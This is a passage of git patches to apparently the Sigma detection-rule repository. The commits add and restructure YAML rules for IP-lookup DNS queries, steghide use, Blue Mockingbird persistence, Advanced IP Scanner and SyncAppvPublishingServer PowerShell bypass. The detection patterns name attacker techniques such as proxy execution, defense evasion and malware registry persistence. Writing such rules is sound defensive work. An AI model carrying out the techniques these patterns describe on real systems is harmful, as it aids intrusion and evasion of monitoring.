wtfismyip.com + - checkip.dyndns.org + - api.2ip.ua + - icanhazip.com + - api.ipify.org + - ip-api.com + - checkip.amazonaws.com + - ipecho.net + - ipinfo.io + - ipv4bot.whatismyipaddress.com + - freegeoip.app browser_process: Image|endswith: - \chrome.exe - \iexplore.exe - \firefox.exe - condition: dns_request and not browser_process \ No newline at end of file + - \brave.exe + - \opera.exe + - \msedge.exe + - \vivaldi.exe + condition: dns_request and not browser_process From 1dec1a49fa6c6aa280c760fbe02b804548e94008 Mon Sep 17 00:00:00 2001 From: albchen Date: Fri, 10 Sep 2021 15:51:32 -0700 Subject: [PATCH 0870/1367] Mapped OriginalFileName in DeviceProcessEvents Mapped OriginalFileName to ProcessVersionInfoOriginalFileName in DeviceProcessEvents. Tested and works for rules such as https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_renamed_binary.yml --- tools/sigma/backends/mdatp.py | 1 + 1 file changed, 1 insertion(+) diff --git a/tools/sigma/backends/mdatp.py b/tools/sigma/backends/mdatp.py index 1d45b747..0becb7a6 100644 --- a/tools/sigma/backends/mdatp.py +++ b/tools/sigma/backends/mdatp.py @@ -83,6 +83,7 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): "ImageLoaded": ("FolderPath", self.default_value_mapping), "LogonType": (self.id_mapping, self.logontype_mapping), "NewProcessName": ("FolderPath", self.default_value_mapping), + "OriginalFileName": ("ProcessVersionInfoOriginalFileName", self.default_value_mapping), "ParentCommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ParentName": ("InitiatingProcessFileName", self.default_value_mapping), "ParentProcessName": ("InitiatingProcessFileName", self.default_value_mapping), From 8d3a77d1f5a8a1fb8f5d137321d457a5f3275ad4 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 11 Sep 2021 08:31:24 +0200 Subject: [PATCH 0871/1367] Update net_susp_ipify.yml --- rules/network/net_susp_ipify.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/network/net_susp_ipify.yml b/rules/network/net_susp_ipify.yml index cbca433a..cf893946 100644 --- a/rules/network/net_susp_ipify.yml +++ b/rules/network/net_susp_ipify.yml @@ -3,6 +3,7 @@ id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2 description: Detects DNS queries for ip lookup services such as api.ipify.org not originating from a browser process. status: experimental date: 2021/07/08 +modified: 2021/09/10 author: Brandon George (blog post), Thomas Patzke (rule) references: - https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon From 89f15c01f9a4b9827af0602505e8675e9179418d Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Sat, 11 Sep 2021 10:56:17 +0200 Subject: [PATCH 0872/1367] New Linux Auditd Rules - Steghide Steganography --- ...nx_auditd_steghide_embed_steganography.yml | 33 +++++++++++++++++++ ..._auditd_steghide_extract_steganography.yml | 31 +++++++++++++++++ 2 files changed, 64 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml create mode 100644 rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml diff --git a/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml b/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml new file mode 100644 index 00000000..36a83f67 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml @@ -0,0 +1,33 @@ +title: Steganography Hide Files with Steghide +id: ce446a9e-30b9-4483-8e38-d2c9ad0a2280 +description: Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/11 +references: + - https://attack.mitre.org/techniques/T1027/003/ + - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - None +level: low +logsource: + product: linux + service: auditd +detection: + type: + type: EXECVE + commands: + a0: steghide + a1: embed + a2: + a2: + - '-cf' + - '-ef' + a4: + a4: + - '-cf' + - '-ef' + condition: type and commands and a2 and a4 diff --git a/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml b/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml new file mode 100644 index 00000000..22c6dd1f --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml @@ -0,0 +1,31 @@ +title: Steganography Extract Files with Steghide +id: a5a827d9-1bbe-4952-9293-c59d897eb41b +description: Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/11 +references: + - https://attack.mitre.org/techniques/T1027/003/ + - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - None +level: low +logsource: + product: linux + service: auditd +detection: + type: + type: EXECVE + commands: + a0: steghide + a1: extract + a2: + a2: '-sf' + a3: + a3|endswith: + - '.jpg' + - '.png' + condition: type and commands and a2 and a3 From d0741f9f3a80fa6c0627b3834c4b8ccde50a1485 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Sat, 11 Sep 2021 11:18:08 +0200 Subject: [PATCH 0873/1367] Update lnx_auditd_steghide_embed_steganography.yml Formatting and detection changes --- .../auditd/lnx_auditd_steghide_embed_steganography.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml b/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml index 36a83f67..584003dc 100644 --- a/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml @@ -17,17 +17,14 @@ logsource: product: linux service: auditd detection: - type: + Steghide: type: EXECVE - commands: a0: steghide a1: embed - a2: a2: - '-cf' - '-ef' - a4: a4: - '-cf' - '-ef' - condition: type and commands and a2 and a4 + condition: Steghide From 6412ddaaee6f4b175f65037c82558473dc83d0d6 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Sat, 11 Sep 2021 11:19:21 +0200 Subject: [PATCH 0874/1367] Update lnx_auditd_steghide_extract_steganography.yml --- .../auditd/lnx_auditd_steghide_extract_steganography.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml b/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml index 22c6dd1f..87fe4c42 100644 --- a/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml @@ -17,15 +17,12 @@ logsource: product: linux service: auditd detection: - type: + Steghide: type: EXECVE - commands: a0: steghide a1: extract - a2: a2: '-sf' - a3: a3|endswith: - '.jpg' - '.png' - condition: type and commands and a2 and a3 + condition: Steghide From 2a76c469e0b4ec8a2b8cd90a75cb5cd75ede5eaa Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 11 Sep 2021 13:34:19 +0200 Subject: [PATCH 0875/1367] normalise name --- ...ervicebus.yml => dns_query_hybridconnectionmgr_servicebus.yml} | 0 .../windows/dns_query/{dns_mega_nz.yml => dns_query_mega_nz.yml} | 0 ...ble_dns_rebinding.yml => dns_query_possible_dns_rebinding.yml} | 0 ...{sysmon_susp_driver_load.yml => driver_load_susp_temp_use.yml} | 0 ...vuln_dell_driver_load.yml => driver_load_vuln_dell_driver.yml} | 0 ...sysmon_windivert_driver_load.yml => driver_load_windivert.yml} | 0 ...mal_octopus_scanner.yml => file_event_mal_octopus_scanner.yml} | 0 ..._mockingbird.yml => process_creation_mal_blue_mockingbird.yml} | 0 ..._darkside.yml => process_creation_mal_darkside_ransomware.yml} | 0 ...kergoga.yml => process_creation_mal_lockergoga_ransomware.yml} | 0 .../malware/{win_mal_ryuk.yml => process_creation_mal_ryuk.yml} | 0 .../{mal_azorult_reg.yml => registry_event_mal_azorult.yml} | 0 .../{win_mal_flowcloud.yml => registry_event_mal_flowcloud.yml} | 0 .../malware/{win_mal_ursnif.yml => registry_event_mal_ursnif.yml} | 0 14 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/dns_query/{dns_query_dns_hybridconnectionmgr_servicebus.yml => dns_query_hybridconnectionmgr_servicebus.yml} (100%) rename rules/windows/dns_query/{dns_mega_nz.yml => dns_query_mega_nz.yml} (100%) rename rules/windows/dns_query/{sysmon_possible_dns_rebinding.yml => dns_query_possible_dns_rebinding.yml} (100%) rename rules/windows/driver_load/{sysmon_susp_driver_load.yml => driver_load_susp_temp_use.yml} (100%) rename rules/windows/driver_load/{sysmon_vuln_dell_driver_load.yml => driver_load_vuln_dell_driver.yml} (100%) rename rules/windows/driver_load/{sysmon_windivert_driver_load.yml => driver_load_windivert.yml} (100%) rename rules/windows/malware/{win_mal_octopus_scanner.yml => file_event_mal_octopus_scanner.yml} (100%) rename rules/windows/malware/{win_mal_blue_mockingbird.yml => process_creation_mal_blue_mockingbird.yml} (100%) rename rules/windows/malware/{win_mal_darkside.yml => process_creation_mal_darkside_ransomware.yml} (100%) rename rules/windows/malware/{win_mal_lockergoga.yml => process_creation_mal_lockergoga_ransomware.yml} (100%) rename rules/windows/malware/{win_mal_ryuk.yml => process_creation_mal_ryuk.yml} (100%) rename rules/windows/malware/{mal_azorult_reg.yml => registry_event_mal_azorult.yml} (100%) rename rules/windows/malware/{win_mal_flowcloud.yml => registry_event_mal_flowcloud.yml} (100%) rename rules/windows/malware/{win_mal_ursnif.yml => registry_event_mal_ursnif.yml} (100%) diff --git a/rules/windows/dns_query/dns_query_dns_hybridconnectionmgr_servicebus.yml b/rules/windows/dns_query/dns_query_hybridconnectionmgr_servicebus.yml similarity index 100% rename from rules/windows/dns_query/dns_query_dns_hybridconnectionmgr_servicebus.yml rename to rules/windows/dns_query/dns_query_hybridconnectionmgr_servicebus.yml diff --git a/rules/windows/dns_query/dns_mega_nz.yml b/rules/windows/dns_query/dns_query_mega_nz.yml similarity index 100% rename from rules/windows/dns_query/dns_mega_nz.yml rename to rules/windows/dns_query/dns_query_mega_nz.yml diff --git a/rules/windows/dns_query/sysmon_possible_dns_rebinding.yml b/rules/windows/dns_query/dns_query_possible_dns_rebinding.yml similarity index 100% rename from rules/windows/dns_query/sysmon_possible_dns_rebinding.yml rename to rules/windows/dns_query/dns_query_possible_dns_rebinding.yml diff --git a/rules/windows/driver_load/sysmon_susp_driver_load.yml b/rules/windows/driver_load/driver_load_susp_temp_use.yml similarity index 100% rename from rules/windows/driver_load/sysmon_susp_driver_load.yml rename to rules/windows/driver_load/driver_load_susp_temp_use.yml diff --git a/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml b/rules/windows/driver_load/driver_load_vuln_dell_driver.yml similarity index 100% rename from rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml rename to rules/windows/driver_load/driver_load_vuln_dell_driver.yml diff --git a/rules/windows/driver_load/sysmon_windivert_driver_load.yml b/rules/windows/driver_load/driver_load_windivert.yml similarity index 100% rename from rules/windows/driver_load/sysmon_windivert_driver_load.yml rename to rules/windows/driver_load/driver_load_windivert.yml diff --git a/rules/windows/malware/win_mal_octopus_scanner.yml b/rules/windows/malware/file_event_mal_octopus_scanner.yml similarity index 100% rename from rules/windows/malware/win_mal_octopus_scanner.yml rename to rules/windows/malware/file_event_mal_octopus_scanner.yml diff --git a/rules/windows/malware/win_mal_blue_mockingbird.yml b/rules/windows/malware/process_creation_mal_blue_mockingbird.yml similarity index 100% rename from rules/windows/malware/win_mal_blue_mockingbird.yml rename to rules/windows/malware/process_creation_mal_blue_mockingbird.yml diff --git a/rules/windows/malware/win_mal_darkside.yml b/rules/windows/malware/process_creation_mal_darkside_ransomware.yml similarity index 100% rename from rules/windows/malware/win_mal_darkside.yml rename to rules/windows/malware/process_creation_mal_darkside_ransomware.yml diff --git a/rules/windows/malware/win_mal_lockergoga.yml b/rules/windows/malware/process_creation_mal_lockergoga_ransomware.yml similarity index 100% rename from rules/windows/malware/win_mal_lockergoga.yml rename to rules/windows/malware/process_creation_mal_lockergoga_ransomware.yml diff --git a/rules/windows/malware/win_mal_ryuk.yml b/rules/windows/malware/process_creation_mal_ryuk.yml similarity index 100% rename from rules/windows/malware/win_mal_ryuk.yml rename to rules/windows/malware/process_creation_mal_ryuk.yml diff --git a/rules/windows/malware/mal_azorult_reg.yml b/rules/windows/malware/registry_event_mal_azorult.yml similarity index 100% rename from rules/windows/malware/mal_azorult_reg.yml rename to rules/windows/malware/registry_event_mal_azorult.yml diff --git a/rules/windows/malware/win_mal_flowcloud.yml b/rules/windows/malware/registry_event_mal_flowcloud.yml similarity index 100% rename from rules/windows/malware/win_mal_flowcloud.yml rename to rules/windows/malware/registry_event_mal_flowcloud.yml diff --git a/rules/windows/malware/win_mal_ursnif.yml b/rules/windows/malware/registry_event_mal_ursnif.yml similarity index 100% rename from rules/windows/malware/win_mal_ursnif.yml rename to rules/windows/malware/registry_event_mal_ursnif.yml From 338c9f5ae750801cb0c83f7ff948f135f58fb1a2 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 11 Sep 2021 13:45:41 +0200 Subject: [PATCH 0876/1367] Split global rule --- .../process_creation_mal_blue_mockingbird.yml | 50 +++++++------------ .../registry_event_mal_blue_mockingbird.yml | 26 ++++++++++ 2 files changed, 44 insertions(+), 32 deletions(-) create mode 100644 rules/windows/malware/registry_event_mal_blue_mockingbird.yml diff --git a/rules/windows/malware/process_creation_mal_blue_mockingbird.yml b/rules/windows/malware/process_creation_mal_blue_mockingbird.yml index 096c0c44..c1a9614b 100644 --- a/rules/windows/malware/process_creation_mal_blue_mockingbird.yml +++ b/rules/windows/malware/process_creation_mal_blue_mockingbird.yml @@ -1,5 +1,10 @@ -action: global title: Blue Mockingbird +id: c3198a27-23a0-4c2c-af19-e5328d49680e +related: + id: ce239692-aa94-41b3-b32f-9cab259c96ea + type: merged +date: 2020/05/14 +modified: 2021/09/11 status: experimental description: Attempts to detect system changes made by Blue Mockingbird references: @@ -9,38 +14,19 @@ tags: - attack.t1112 - attack.t1047 author: Trent Liffick (@tliffick) -date: 2020/05/14 -falsepositives: - - unknown -level: high -detection: - condition: 1 of them ---- -id: c3198a27-23a0-4c2c-af19-e5328d49680e logsource: category: process_creation product: windows detection: - exec_selection: - Image|endswith: '\cmd.exe' - CommandLine|contains|all: - - 'sc config' - - 'wercplsupporte.dll' ---- -id: ce239692-aa94-41b3-b32f-9cab259c96ea -logsource: - category: process_creation - product: windows -detection: - wmic_cmd: - Image|endswith: '\wmic.exe' - CommandLine|endswith: 'COR_PROFILER' ---- -id: 92b0b372-a939-44ed-a11b-5136cf680e27 -logsource: - product: windows - category: registry_event -detection: - mod_reg: - TargetObject|endswith: - - '\CurrentControlSet\Services\wercplsupport\Parameters\ServiceDll' + sc_cmd: + Image|endswith: '\cmd.exe' + CommandLine|contains|all: + - 'sc config' + - 'wercplsupporte.dll' + wmic_cmd: + Image|endswith: '\wmic.exe' + CommandLine|endswith: 'COR_PROFILER' + condition: sc_cmd or wmic_cmd +falsepositives: + - unknown +level: high \ No newline at end of file diff --git a/rules/windows/malware/registry_event_mal_blue_mockingbird.yml b/rules/windows/malware/registry_event_mal_blue_mockingbird.yml new file mode 100644 index 00000000..d8eaebda --- /dev/null +++ b/rules/windows/malware/registry_event_mal_blue_mockingbird.yml @@ -0,0 +1,26 @@ +title: Blue Mockingbird +id: 92b0b372-a939-44ed-a11b-5136cf680e27 +related: + id: c3198a27-23a0-4c2c-af19-e5328d49680e + type: derived +date: 2020/05/14 +modified: 2021/09/11 +status: experimental +description: Attempts to detect system changes made by Blue Mockingbird +references: + - https://redcanary.com/blog/blue-mockingbird-cryptominer/ +tags: + - attack.execution + - attack.t1112 + - attack.t1047 +author: Trent Liffick (@tliffick) +logsource: + product: windows + category: registry_event +detection: + mod_reg: + TargetObject|endswith: '\CurrentControlSet\Services\wercplsupport\Parameters\ServiceDll' + condition: mod_reg +falsepositives: + - unknown +level: high \ No newline at end of file From a73d37cd72c307e132343900a4bcba2f75332257 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 11 Sep 2021 14:22:01 +0200 Subject: [PATCH 0877/1367] fix related --- .../windows/malware/process_creation_mal_blue_mockingbird.yml | 4 ++-- rules/windows/malware/registry_event_mal_blue_mockingbird.yml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/malware/process_creation_mal_blue_mockingbird.yml b/rules/windows/malware/process_creation_mal_blue_mockingbird.yml index c1a9614b..dc66bb56 100644 --- a/rules/windows/malware/process_creation_mal_blue_mockingbird.yml +++ b/rules/windows/malware/process_creation_mal_blue_mockingbird.yml @@ -1,8 +1,8 @@ title: Blue Mockingbird id: c3198a27-23a0-4c2c-af19-e5328d49680e related: - id: ce239692-aa94-41b3-b32f-9cab259c96ea - type: merged + - id: ce239692-aa94-41b3-b32f-9cab259c96ea + type: merged date: 2020/05/14 modified: 2021/09/11 status: experimental diff --git a/rules/windows/malware/registry_event_mal_blue_mockingbird.yml b/rules/windows/malware/registry_event_mal_blue_mockingbird.yml index d8eaebda..ba78af08 100644 --- a/rules/windows/malware/registry_event_mal_blue_mockingbird.yml +++ b/rules/windows/malware/registry_event_mal_blue_mockingbird.yml @@ -1,8 +1,8 @@ title: Blue Mockingbird id: 92b0b372-a939-44ed-a11b-5136cf680e27 related: - id: c3198a27-23a0-4c2c-af19-e5328d49680e - type: derived + - id: c3198a27-23a0-4c2c-af19-e5328d49680e + type: derived date: 2020/05/14 modified: 2021/09/11 status: experimental From 2223afb6fe3e791b4761132074b4ed801ab9583d Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 11 Sep 2021 20:30:32 +0200 Subject: [PATCH 0878/1367] split global rules --- .../file_event_advanced_ip_scanner.yml} | 24 ++++++----------- ...owershell_syncappvpublishingserver_exe.yml | 24 +++++++++++++++++ .../process_creation_advanced_ip_scanner.yml | 26 +++++++++++++++++++ ...creation_syncappvpublishingserver_exe.yml} | 22 +++++----------- 4 files changed, 64 insertions(+), 32 deletions(-) rename rules/windows/{process_creation/win_advanced_ip_scanner.yml => file_event/file_event_advanced_ip_scanner.yml} (79%) create mode 100644 rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml create mode 100644 rules/windows/process_creation/process_creation_advanced_ip_scanner.yml rename rules/windows/process_creation/{win_syncappvpublishingserver_exe.yml => process_creation_syncappvpublishingserver_exe.yml} (76%) diff --git a/rules/windows/process_creation/win_advanced_ip_scanner.yml b/rules/windows/file_event/file_event_advanced_ip_scanner.yml similarity index 79% rename from rules/windows/process_creation/win_advanced_ip_scanner.yml rename to rules/windows/file_event/file_event_advanced_ip_scanner.yml index 92df8008..4fdf3650 100644 --- a/rules/windows/process_creation/win_advanced_ip_scanner.yml +++ b/rules/windows/file_event/file_event_advanced_ip_scanner.yml @@ -1,5 +1,8 @@ -action: global title: Advanced IP Scanner +id: fed85bf9-e075-4280-9159-fbe8a023d6fa +related: + - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f + type: derived status: experimental description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. references: @@ -10,24 +13,10 @@ references: - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer author: '@ROxPinTeddy' date: 2020/05/12 -modified: 2021/05/11 +modified: 2021/09/11 tags: - attack.discovery - attack.t1046 -falsepositives: - - Legitimate administrative use -level: medium ---- -id: bef37fa2-f205-4a7b-b484-0759bfd5f86f -logsource: - category: process_creation - product: windows -detection: - selection: - Image|contains: '\advanced_ip_scanner' - condition: selection ---- -id: fed85bf9-e075-4280-9159-fbe8a023d6fa logsource: category: file_event product: windows @@ -35,3 +24,6 @@ detection: selection: TargetFilename|contains: '\AppData\Local\Temp\Advanced IP Scanner 2' condition: selection +falsepositives: + - Legitimate administrative use +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml b/rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml new file mode 100644 index 00000000..1b817587 --- /dev/null +++ b/rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml @@ -0,0 +1,24 @@ +title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction +id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 +related: + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. +references: + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ +author: 'Ensar Şamil, @sblmsrsn, OSCD Community' +date: 2020/10/05 +modified: 2021/09/11 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + service: powershell +detection: + selection: + - 'SyncAppvPublishingServer.exe' + condition: selection +falsepositives: + - App-V clients +level: medium \ No newline at end of file diff --git a/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml b/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml new file mode 100644 index 00000000..7b2b85e2 --- /dev/null +++ b/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml @@ -0,0 +1,26 @@ +title: Advanced IP Scanner +id: bef37fa2-f205-4a7b-b484-0759bfd5f86f +status: experimental +description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. +references: + - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ + - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html + - https://labs.f-secure.com/blog/prelude-to-ransomware-systembc + - https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf + - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer +author: '@ROxPinTeddy' +date: 2020/05/12 +modified: 2021/05/11 +tags: + - attack.discovery + - attack.t1046 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|contains: '\advanced_ip_scanner' + condition: selection +falsepositives: + - Legitimate administrative use +level: medium \ No newline at end of file diff --git a/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml b/rules/windows/process_creation/process_creation_syncappvpublishingserver_exe.yml similarity index 76% rename from rules/windows/process_creation/win_syncappvpublishingserver_exe.yml rename to rules/windows/process_creation/process_creation_syncappvpublishingserver_exe.yml index fb4c81e3..8a8fb511 100644 --- a/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml +++ b/rules/windows/process_creation/process_creation_syncappvpublishingserver_exe.yml @@ -1,31 +1,21 @@ -action: global title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction +id: fde7929d-8beb-4a4c-b922-be9974671667 description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ author: 'Ensar Şamil, @sblmsrsn, OSCD Community' date: 2020/10/05 +modified: 2021/09/11 tags: - attack.defense_evasion - attack.t1218 -detection: - condition: selection -falsepositives: - - App-V clients -level: medium ---- -id: fde7929d-8beb-4a4c-b922-be9974671667 logsource: product: windows category: process_creation detection: selection: Image|endswith: '\SyncAppvPublishingServer.exe' ---- -id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 -logsource: - product: windows - service: powershell -detection: - selection: - - 'SyncAppvPublishingServer.exe' \ No newline at end of file + condition: selection +falsepositives: + - App-V clients +level: medium \ No newline at end of file From e355367c0310a8b69605761cbe7d7e2bf7fb79a3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 12 Sep 2021 07:46:35 +0200 Subject: [PATCH 0879/1367] Clean SyncAppvPublishingServer rules --- .../process_creation_syncappvpublishingserver_exe.yml | 0 ...vpublishingserver_execute_arbitrary_powershell.yml | 6 +++--- ...yncappvpublishingserver_vbs_execute_powershell.yml | 11 ++++++----- 3 files changed, 9 insertions(+), 8 deletions(-) rename rules/windows/{process_creation => deprecated}/process_creation_syncappvpublishingserver_exe.yml (100%) diff --git a/rules/windows/process_creation/process_creation_syncappvpublishingserver_exe.yml b/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml similarity index 100% rename from rules/windows/process_creation/process_creation_syncappvpublishingserver_exe.yml rename to rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml diff --git a/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml b/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml index 5c67cda5..53a1dd16 100644 --- a/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml +++ b/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml @@ -6,9 +6,11 @@ related: status: experimental author: frack113 date: 2021/07/12 +modified: 2021/09/12 description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ tags: - attack.defense_evasion - attack.t1218 @@ -18,9 +20,7 @@ logsource: detection: selection: Image|endswith: '\SyncAppvPublishingServer.exe' - CommandLine|contains|all: - - '"n; ' - - ' Start-Process ' + CommandLine|contains: '"n; ' condition: selection fields: - ComputerName diff --git a/rules/windows/process_creation/process_creation_syncappvpublishingserver_vbs_execute_powershell.yml b/rules/windows/process_creation/process_creation_syncappvpublishingserver_vbs_execute_powershell.yml index 54782330..59ddee7c 100644 --- a/rules/windows/process_creation/process_creation_syncappvpublishingserver_vbs_execute_powershell.yml +++ b/rules/windows/process_creation/process_creation_syncappvpublishingserver_vbs_execute_powershell.yml @@ -3,23 +3,24 @@ id: 36475a7d-0f6d-4dce-9b01-6aeb473bbaf1 status: experimental author: frack113 date: 2021/07/16 -description: Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. +modified: 2021/09/12 +description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ tags: - attack.defense_evasion + - attack.t1218 - attack.t1216 logsource: category: process_creation product: windows detection: select_vbs: - CommandLine|contains: '\SyncAppvPublishingServer.vbs' - select_opt: CommandLine|contains|all: + - '\SyncAppvPublishingServer.vbs' - '"n;' - - 'Start-Process ' - condition: select_vbs and select_opt + condition: select_vbs fields: - ComputerName - User From 830c0c9f221f5ee8bd14dc1a6dbe5b2f5a2bbd05 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 12 Sep 2021 08:53:10 +0200 Subject: [PATCH 0880/1367] Update process_creation_advanced_ip_scanner.yml --- .../process_creation/process_creation_advanced_ip_scanner.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml b/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml index 7b2b85e2..36e07720 100644 --- a/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml +++ b/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml @@ -10,7 +10,7 @@ references: - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer author: '@ROxPinTeddy' date: 2020/05/12 -modified: 2021/05/11 +modified: 2021/09/12 tags: - attack.discovery - attack.t1046 @@ -23,4 +23,4 @@ detection: condition: selection falsepositives: - Legitimate administrative use -level: medium \ No newline at end of file +level: medium From 3db427873a4c25fb40eb53f25506fc06eb4bf353 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 12 Sep 2021 09:38:05 +0200 Subject: [PATCH 0881/1367] split sysinternals eula and uac bypass --- ...s_creation_sysinternals_eula_accepted.yml} | 29 +++++++------------ ...s_creation_sysmon_uac_bypass_eventvwr.yml} | 25 +++++----------- ...istry_event_sysinternals_eula_accepted.yml | 23 +++++++++++++++ .../registry_event_uac_bypass_eventvwr.yml | 27 +++++++++++++++++ 4 files changed, 69 insertions(+), 35 deletions(-) rename rules/windows/{registry_event/sysmon_sysinternals_eula_accepted.yml => process_creation/process_creation_sysinternals_eula_accepted.yml} (68%) mode change 100755 => 100644 rename rules/windows/{registry_event/sysmon_uac_bypass_eventvwr.yml => process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml} (73%) mode change 100755 => 100644 create mode 100755 rules/windows/registry_event/registry_event_sysinternals_eula_accepted.yml create mode 100755 rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml diff --git a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml b/rules/windows/process_creation/process_creation_sysinternals_eula_accepted.yml old mode 100755 new mode 100644 similarity index 68% rename from rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml rename to rules/windows/process_creation/process_creation_sysinternals_eula_accepted.yml index bde975b9..0b9abfec --- a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml +++ b/rules/windows/process_creation/process_creation_sysinternals_eula_accepted.yml @@ -1,33 +1,26 @@ -action: global title: Usage of Sysinternals Tools +id: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b +related: + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived status: experimental description: Detects the usage of Sysinternals Tools due to accepteula key being added to Registry references: - https://twitter.com/Moti_B/status/1008587936735035392 date: 2017/08/28 +modified: 2021/09/12 author: Markus Neis -falsepositives: - - Legitimate use of SysInternals tools - - Programs that use the same Registry Key -level: low tags: - attack.resource_development - attack.t1588.002 ---- -id: 